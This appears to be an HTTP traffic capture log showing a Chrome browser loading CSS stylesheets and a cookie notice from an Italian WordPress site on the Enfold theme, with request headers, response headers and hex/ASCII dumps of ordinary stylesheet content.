2025-01-09 12:19:10 UTC	11459	IN	Data Raw: 65 63 65 73 73 61 72 69 20 70 65 72 20 69 6c 20 66 75 6e 7a 69 6f 6e 61 6d 65 6e 74 6f 20 64 69 20 71 75 65 73 74 6f 20 73 69 74 6f 2e 20 50 65 72 20 74 75 74 74 69 20 67 6c 69 20 61 6c 74 72 69 20 74 69 70 69 20 64 69 20 63 6f 6f 6b 69 65 20 61 62 62 69 61 6d 6f 20 62 69 73 6f 67 6e 6f 20 64 65 6c 20 73 75 6f 20 70 65 72 6d 65 73 73 6f 2e 3c 62 72 20 2f 3e 0d 0a 3c 62 72 20 2f 3e 0d 0a 51 75 65 73 74 6f 20 73 69 74 6f 20 75 74 69 6c 69 7a 7a 61 20 64 69 76 65 72 73 69 20 74 69 70 69 20 64 69 20 63 6f 6f 6b 69 65 2e 20 41 6c 63 75 6e 69 20 63 6f 6f 6b 69 65 20 73 6f 6e 6f 20 63 6f 6c 6c 6f 63 61 74 65 20 64 61 20 73 65 72 76 69 7a 69 20 64 69 20 74 65 72 7a 69 20 63 68 65 20 63 6f 6d 70 61 69 6f 6e 6f 20 73 75 6c 6c 65 20 6e 6f 73 74 72 65 20 70 61 67 69 Data Ascii: ecessari per il funzionamento di questo sito. Per tutti gli altri tipi di cookie abbiamo bisogno del suo permesso.<br /><br />Questo sito utilizza diversi tipi di cookie. Alcuni cookie sono collocate da servizi di terzi che compaiono sulle nostre pagi

Timestamp	Bytes transferred	Direction	Data
2025-01-09 12:19:11 UTC	584	OUT	GET /wp-content/themes/enfold/css/grid.css?ver=4.5 HTTP/1.1 Host: www.cipassoitalia.it Connection: keep-alive sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117" sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 sec-ch-ua-platform: "Windows" Accept: text/css,/;q=0.1 Sec-Fetch-Site: same-origin Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: style Referer: https://www.cipassoitalia.it/ Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2025-01-09 12:19:11 UTC	292	IN	HTTP/1.1 200 OK Server: aruba-proxy Date: Thu, 09 Jan 2025 12:19:11 GMT Content-Type: text/css Content-Length: 9488 Connection: close Vary: Accept-Encoding Last-Modified: Mon, 18 Mar 2019 15:16:34 GMT Accept-Ranges: bytes X-ServerName: webx.aruba.it Alt-Svc: h3=":443"; ma=86400
2025-01-09 12:19:11 UTC	9488	IN	Data Raw: 0a 2f 2a 20 54 61 62 6c 65 20 6f 66 20 43 6f 6e 74 65 6e 74 73 0a 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 0a 20 20 20 20 23 42 61 73 65 20 39 36 30 20 47 72 69 64 0a 20 20 20 20 23 54 61 62 6c 65 74 20 28 50 6f 72 74 72 61 69 74 29 0a 20 20 20 20 23 4d 6f 62 69 6c 65 20 28 50 6f 72 74 72 61 69 74 29 0a 20 20 20 20 23 4d 6f 62 69 6c 65 20 28 4c 61 6e 64 73 63 61 70 65 29 0a 20 20 20 20 23 43 6c 65 61 72 69 6e 67 20 2a 2f 0a 2f 2a 20 23 42 61 73 65 20 39 36 30 20 47 72 69 64 0a 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 20 2a 2f 0a 68 74 6d 6c Data Ascii: /* Table of Contents================================================== #Base 960 Grid #Tablet (Portrait) #Mobile (Portrait) #Mobile (Landscape) #Clearing // #Base 960 Grid================================================== */html

Timestamp	Bytes transferred	Direction	Data
2025-01-09 12:19:11 UTC	584	OUT	GET /wp-content/themes/enfold/css/base.css?ver=4.5 HTTP/1.1 Host: www.cipassoitalia.it Connection: keep-alive sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117" sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 sec-ch-ua-platform: "Windows" Accept: text/css,/;q=0.1 Sec-Fetch-Site: same-origin Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: style Referer: https://www.cipassoitalia.it/ Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2025-01-09 12:19:11 UTC	293	IN	HTTP/1.1 200 OK Server: aruba-proxy Date: Thu, 09 Jan 2025 12:19:11 GMT Content-Type: text/css Content-Length: 19050 Connection: close Vary: Accept-Encoding Last-Modified: Mon, 18 Mar 2019 15:16:34 GMT Accept-Ranges: bytes X-ServerName: webx.aruba.it Alt-Svc: h3=":443"; ma=86400
2025-01-09 12:19:11 UTC	16091	IN	Data Raw: 2f 2a 20 54 61 62 6c 65 20 6f 66 20 43 6f 6e 74 65 6e 74 0a 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 0a 09 23 52 65 73 65 74 20 26 20 42 61 73 69 63 73 0a 09 23 42 61 73 69 63 20 53 74 79 6c 65 73 0a 09 23 53 69 74 65 20 53 74 79 6c 65 73 0a 09 23 54 79 70 6f 67 72 61 70 68 79 0a 09 23 4c 69 6e 6b 73 0a 09 23 4c 69 73 74 73 0a 09 23 49 6d 61 67 65 73 0a 09 23 42 75 74 74 6f 6e 73 0a 09 23 46 6f 72 6d 73 0a 09 23 54 61 62 6c 65 0a 09 23 4d 69 73 63 0a 20 20 20 20 23 57 6f 72 64 50 72 65 73 73 20 47 65 6e 65 72 61 74 65 64 20 47 65 6e 65 72 69 63 73 0a 20 20 20 20 23 70 72 69 6e 74 20 73 74 79 6c 65 73 0a 2a 2f 0a 0a 2f 2a 20 23 52 65 73 65 74 20 26 Data Ascii: /* Table of Content==================================================#Reset & Basics#Basic Styles#Site Styles#Typography#Links#Lists#Images#Buttons#Forms#Table#Misc #WordPress Generated Generics #print styles// #Reset &
2025-01-09 12:19:11 UTC	2959	IN	Data Raw: 74 61 69 6e 65 72 7b 77 69 64 74 68 3a 31 30 30 25 7d 0a 23 74 6f 70 7b 6f 76 65 72 66 6c 6f 77 2d 78 3a 68 69 64 64 65 6e 7d 0a 2e 62 6f 78 65 64 23 74 6f 70 7b 77 69 64 74 68 3a 31 30 30 25 7d 0a 2e 63 6f 6e 74 61 69 6e 65 72 7b 77 69 64 74 68 3a 31 30 30 25 3b 6d 61 72 67 69 6e 3a 30 20 61 75 74 6f 7d 0a 2e 75 6e 69 74 73 2c 2e 75 6e 69 74 7b 6d 61 72 67 69 6e 3a 30 7d 0a 2e 63 6f 6e 74 61 69 6e 65 72 20 2e 6f 6e 65 2e 75 6e 69 74 2c 2e 63 6f 6e 74 61 69 6e 65 72 20 2e 6f 6e 65 2e 75 6e 69 74 73 2c 2e 63 6f 6e 74 61 69 6e 65 72 20 2e 74 77 6f 2e 75 6e 69 74 73 2c 2e 63 6f 6e 74 61 69 6e 65 72 20 2e 74 68 72 65 65 2e 75 6e 69 74 73 2c 2e 63 6f 6e 74 61 69 6e 65 72 20 2e 66 6f 75 72 2e 75 6e 69 74 73 2c 2e 63 6f 6e 74 61 69 6e 65 72 20 2e 66 69 76 65 2e Data Ascii: tainer{width:100%}#top{overflow-x:hidden}.boxed#top{width:100%}.container{width:100%;margin:0 auto}.units,.unit{margin:0}.container .one.unit,.container .one.units,.container .two.units,.container .three.units,.container .four.units,.container .five.

Timestamp	Bytes transferred	Direction	Data
2025-01-09 12:19:11 UTC	586	OUT	GET /wp-content/themes/enfold/css/layout.css?ver=4.5 HTTP/1.1 Host: www.cipassoitalia.it Connection: keep-alive sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117" sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 sec-ch-ua-platform: "Windows" Accept: text/css,/;q=0.1 Sec-Fetch-Site: same-origin Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: style Referer: https://www.cipassoitalia.it/ Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2025-01-09 12:19:11 UTC	293	IN	HTTP/1.1 200 OK Server: aruba-proxy Date: Thu, 09 Jan 2025 12:19:11 GMT Content-Type: text/css Content-Length: 79923 Connection: close Vary: Accept-Encoding Last-Modified: Mon, 18 Mar 2019 15:16:34 GMT Accept-Ranges: bytes X-ServerName: webx.aruba.it Alt-Svc: h3=":443"; ma=86400
2025-01-09 12:19:11 UTC	16091	IN	Data Raw: 2f 2a 20 54 61 62 6c 65 20 6f 66 20 43 6f 6e 74 65 6e 74 0a 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 0a 09 23 53 69 74 65 20 53 74 79 6c 65 73 0a 09 23 42 6c 6f 67 20 53 74 79 6c 65 73 0a 09 23 50 61 67 65 20 53 74 79 6c 65 73 0a 09 23 50 6f 73 74 20 46 6f 72 6d 61 74 73 0a 09 23 57 69 64 67 65 74 20 26 20 53 69 64 65 62 61 72 0a 09 23 46 6f 6f 74 65 72 Data Ascii: /* Table of Content======================================================================================================================================================#Site Styles#Blog Styles#Page Styles#Post Formats#Widget & Sidebar#Footer
2025-01-09 12:19:11 UTC	16384	IN	Data Raw: 3a 73 6f 6c 69 64 3b 20 7d 0a 0a 2e 68 74 6d 6c 5f 68 65 61 64 65 72 5f 73 69 64 65 62 61 72 2e 68 74 6d 6c 5f 63 6f 6e 74 65 6e 74 5f 61 6c 69 67 6e 5f 6c 65 66 74 20 20 2e 63 6f 6e 74 61 69 6e 65 72 20 7b 66 6c 6f 61 74 3a 6c 65 66 74 3b 7d 0a 2e 68 74 6d 6c 5f 68 65 61 64 65 72 5f 73 69 64 65 62 61 72 2e 68 74 6d 6c 5f 63 6f 6e 74 65 6e 74 5f 61 6c 69 67 6e 5f 72 69 67 68 74 20 2e 63 6f 6e 74 61 69 6e 65 72 20 7b 66 6c 6f 61 74 3a 72 69 67 68 74 3b 7d 0a 0a 2e 68 74 6d 6c 5f 68 65 61 64 65 72 5f 73 69 64 65 62 61 72 2e 68 74 6d 6c 5f 63 6f 6e 74 65 6e 74 5f 61 6c 69 67 6e 5f 6c 65 66 74 20 23 66 6f 6f 74 65 72 2c 20 2e 68 74 6d 6c 5f 68 65 61 64 65 72 5f 73 69 64 65 62 61 72 2e 68 74 6d 6c 5f 63 6f 6e 74 65 6e 74 5f 61 6c 69 67 6e 5f 72 69 67 68 74 20 Data Ascii: :solid; }.html_header_sidebar.html_content_align_left .container {float:left;}.html_header_sidebar.html_content_align_right .container {float:right;}.html_header_sidebar.html_content_align_left #footer, .html_header_sidebar.html_content_align_right
2025-01-09 12:19:11 UTC	16384	IN	Data Raw: 77 69 64 74 68 3a 20 6e 6f 6e 65 3b 0a 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 20 6e 6f 6e 65 3b 0a 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 69 6e 68 65 72 69 74 3b 0a 7d 0a 0a 23 74 6f 70 20 2e 61 76 2d 6d 61 69 6e 2d 6e 61 76 20 75 6c 20 75 6c 20 7b 0a 6c 65 66 74 3a 2d 32 30 37 70 78 3b 0a 74 6f 70 3a 30 70 78 3b 0a 6d 61 72 67 69 6e 3a 30 3b 0a 62 6f 72 64 65 72 2d 74 6f 70 2d 73 74 79 6c 65 3a 20 73 6f 6c 69 64 3b 0a 62 6f 72 64 65 72 2d 74 6f 70 2d 77 69 64 74 68 3a 20 31 70 78 3b 0a 70 61 64 64 69 6e 67 2d 74 6f 70 3a 20 30 70 78 0a 7d 0a 0a 2e 61 76 2d 6d 61 69 6e 2d 6e 61 76 20 6c 69 3a 68 6f 76 65 72 20 75 6c 20 75 6c 7b 20 64 69 73 70 6c 61 79 3a 6e 6f 6e 65 3b 20 7d 0a 23 74 6f 70 20 2e 61 76 2d 6d 61 69 6e 2d 6e 61 76 20 6c 69 3a 68 6f Data Ascii: width: none;text-decoration: none;font-family: inherit;}#top .av-main-nav ul ul {left:-207px;top:0px;margin:0;border-top-style: solid;border-top-width: 1px;padding-top: 0px}.av-main-nav li:hover ul ul{ display:none; }#top .av-main-nav li:ho
2025-01-09 12:19:11 UTC	16384	IN	Data Raw: 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 20 6e 6f 6e 65 3b 0a 64 69 73 70 6c 61 79 3a 20 62 6c 6f 63 6b 3b 0a 62 6f 72 64 65 72 2d 74 6f 70 2d 73 74 79 6c 65 3a 20 64 61 73 68 65 64 3b 0a 62 6f 72 64 65 72 2d 74 6f 70 2d 77 69 64 74 68 3a 20 31 70 78 3b 0a 7d 0a 0a 23 74 6f 70 20 2e 73 75 62 5f 6d 65 6e 75 20 6c 69 20 6c 69 3a 66 69 72 73 74 2d 63 68 69 6c 64 20 3e 20 61 20 7b 0a 62 6f 72 64 65 72 3a 20 6e 6f 6e 65 3b 0a 7d 0a 0a 0a 23 74 6f 70 20 2e 73 75 62 5f 6d 65 6e 75 20 6c 69 20 6c 69 20 61 3a 68 6f 76 65 72 7b 0a 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 20 6e 6f 6e 65 3b 0a 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 66 38 66 38 66 38 3b 0a 7d 0a 0a 2f 2a 74 68 69 72 64 20 6c 65 76 65 6c 20 61 6e 64 20 64 65 65 70 65 72 2a 2f 0a 23 74 6f 70 20 Data Ascii: xt-decoration: none;display: block;border-top-style: dashed;border-top-width: 1px;}#top .sub_menu li li:first-child > a {border: none;}#top .sub_menu li li a:hover{text-decoration: none;background: #f8f8f8;}/third level and deeper/#top
2025-01-09 12:19:11 UTC	14680	IN	Data Raw: 09 09 2e 72 65 73 70 6f 6e 73 69 76 65 20 2e 61 76 69 61 2d 63 6f 6f 6b 69 65 6d 65 73 73 61 67 65 2d 62 6f 74 74 6f 6d 2d 6c 65 66 74 2c 0a 09 09 2e 72 65 73 70 6f 6e 73 69 76 65 20 2e 61 76 69 61 2d 63 6f 6f 6b 69 65 6d 65 73 73 61 67 65 2d 74 6f 70 2d 72 69 67 68 74 2c 0a 09 09 2e 72 65 73 70 6f 6e 73 69 76 65 20 2e 61 76 69 61 2d 63 6f 6f 6b 69 65 6d 65 73 73 61 67 65 2d 62 6f 74 74 6f 6d 2d 72 69 67 68 74 7b 20 77 69 64 74 68 3a 20 33 35 25 3b 20 7d 0a 0a 0a 09 7d 0a 0a 09 2f 2a 20 54 61 62 6c 65 74 20 50 6f 72 74 72 61 69 74 20 73 69 7a 65 20 74 6f 20 73 74 61 6e 64 61 72 64 20 39 36 30 20 28 64 65 76 69 63 65 73 20 61 6e 64 20 62 72 6f 77 73 65 72 73 29 20 2a 2f 0a 09 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e Data Ascii: .responsive .avia-cookiemessage-bottom-left,.responsive .avia-cookiemessage-top-right,.responsive .avia-cookiemessage-bottom-right{ width: 35%; }}/* Tablet Portrait size to standard 960 (devices and browsers) */@media only screen and (min

Timestamp	Bytes transferred	Direction	Data
2025-01-09 12:19:11 UTC	642	OUT	GET /wp-content/themes/enfold/config-templatebuilder/avia-shortcodes/audio-player/audio-player.css?ver=6.0.9 HTTP/1.1 Host: www.cipassoitalia.it Connection: keep-alive sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117" sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 sec-ch-ua-platform: "Windows" Accept: text/css,/;q=0.1 Sec-Fetch-Site: same-origin Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: style Referer: https://www.cipassoitalia.it/ Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2025-01-09 12:19:11 UTC	292	IN	HTTP/1.1 200 OK Server: aruba-proxy Date: Thu, 09 Jan 2025 12:19:11 GMT Content-Type: text/css Content-Length: 1385 Connection: close Vary: Accept-Encoding Last-Modified: Mon, 18 Mar 2019 15:16:30 GMT Accept-Ranges: bytes X-ServerName: webx.aruba.it Alt-Svc: h3=":443"; ma=86400
2025-01-09 12:19:11 UTC	1385	IN	Data Raw: 2f 2a 20 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 0a 41 56 49 41 20 50 4c 41 59 45 52 20 0a 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d Data Ascii: /* ======================================================================================================================================================AVIA PLAYER ========================================================================================

Timestamp	Bytes transferred	Direction	Data
2025-01-09 12:19:12 UTC	632	OUT	GET /wp-content/themes/enfold/config-templatebuilder/avia-shortcodes/buttons/buttons.css?ver=6.0.9 HTTP/1.1 Host: www.cipassoitalia.it Connection: keep-alive sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117" sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 sec-ch-ua-platform: "Windows" Accept: text/css,/;q=0.1 Sec-Fetch-Site: same-origin Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: style Referer: https://www.cipassoitalia.it/ Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2025-01-09 12:19:12 UTC	292	IN	HTTP/1.1 200 OK Server: aruba-proxy Date: Thu, 09 Jan 2025 12:19:12 GMT Content-Type: text/css Content-Length: 4709 Connection: close Vary: Accept-Encoding Last-Modified: Mon, 18 Mar 2019 15:16:30 GMT Accept-Ranges: bytes X-ServerName: webx.aruba.it Alt-Svc: h3=":443"; ma=86400
2025-01-09 12:19:12 UTC	4709	IN	Data Raw: 2f 2a 20 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 0a 42 75 74 74 6f 6e 0a 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d Data Ascii: /* ======================================================================================================================================================Button==============================================================================================

Timestamp	Bytes transferred	Direction	Data
2025-01-09 12:19:12 UTC	634	OUT	GET /wp-content/themes/enfold/config-templatebuilder/avia-shortcodes/comments/comments.css?ver=6.0.9 HTTP/1.1 Host: www.cipassoitalia.it Connection: keep-alive sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117" sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 sec-ch-ua-platform: "Windows" Accept: text/css,/;q=0.1 Sec-Fetch-Site: same-origin Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: style Referer: https://www.cipassoitalia.it/ Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2025-01-09 12:19:13 UTC	292	IN	HTTP/1.1 200 OK Server: aruba-proxy Date: Thu, 09 Jan 2025 12:19:12 GMT Content-Type: text/css Content-Length: 5508 Connection: close Vary: Accept-Encoding Last-Modified: Mon, 18 Mar 2019 15:16:30 GMT Accept-Ranges: bytes X-ServerName: webx.aruba.it Alt-Svc: h3=":443"; ma=86400
2025-01-09 12:19:13 UTC	5508	IN	Data Raw: 2f 2a 20 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 0a 23 43 6f 6d 6d 65 6e 74 0a 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d Data Ascii: /* ======================================================================================================================================================#Comment============================================================================================

Timestamp	Bytes transferred	Direction	Data
2025-01-09 12:19:13 UTC	644	OUT	GET /wp-content/themes/enfold/config-templatebuilder/avia-shortcodes/contentslider/contentslider.css?ver=6.0.9 HTTP/1.1 Host: www.cipassoitalia.it Connection: keep-alive sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117" sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 sec-ch-ua-platform: "Windows" Accept: text/css,/;q=0.1 Sec-Fetch-Site: same-origin Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: style Referer: https://www.cipassoitalia.it/ Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2025-01-09 12:19:14 UTC	292	IN	HTTP/1.1 200 OK Server: aruba-proxy Date: Thu, 09 Jan 2025 12:19:13 GMT Content-Type: text/css Content-Length: 2717 Connection: close Vary: Accept-Encoding Last-Modified: Mon, 18 Mar 2019 15:16:30 GMT Accept-Ranges: bytes X-ServerName: webx.aruba.it Alt-Svc: h3=":443"; ma=86400
2025-01-09 12:19:14 UTC	2717	IN	Data Raw: 2f 2a 20 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 0a 50 61 72 74 6e 65 72 2f 4c 6f 67 6f 20 53 6c 69 64 65 72 20 2b 20 43 6f 6e 74 65 6e 74 20 53 6c 69 64 65 72 0a 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d Data Ascii: /* ======================================================================================================================================================Partner/Logo Slider + Content Slider================================================================

Timestamp	Bytes transferred	Direction	Data
2025-01-09 12:19:14 UTC	632	OUT	GET /wp-content/themes/enfold/config-templatebuilder/avia-shortcodes/heading/heading.css?ver=6.0.9 HTTP/1.1 Host: www.cipassoitalia.it Connection: keep-alive sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117" sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 sec-ch-ua-platform: "Windows" Accept: text/css,/;q=0.1 Sec-Fetch-Site: same-origin Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: style Referer: https://www.cipassoitalia.it/ Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2025-01-09 12:19:15 UTC	292	IN	HTTP/1.1 200 OK Server: aruba-proxy Date: Thu, 09 Jan 2025 12:19:14 GMT Content-Type: text/css Content-Length: 3211 Connection: close Vary: Accept-Encoding Last-Modified: Mon, 18 Mar 2019 15:16:30 GMT Accept-Ranges: bytes X-ServerName: webx.aruba.it Alt-Svc: h3=":443"; ma=86400
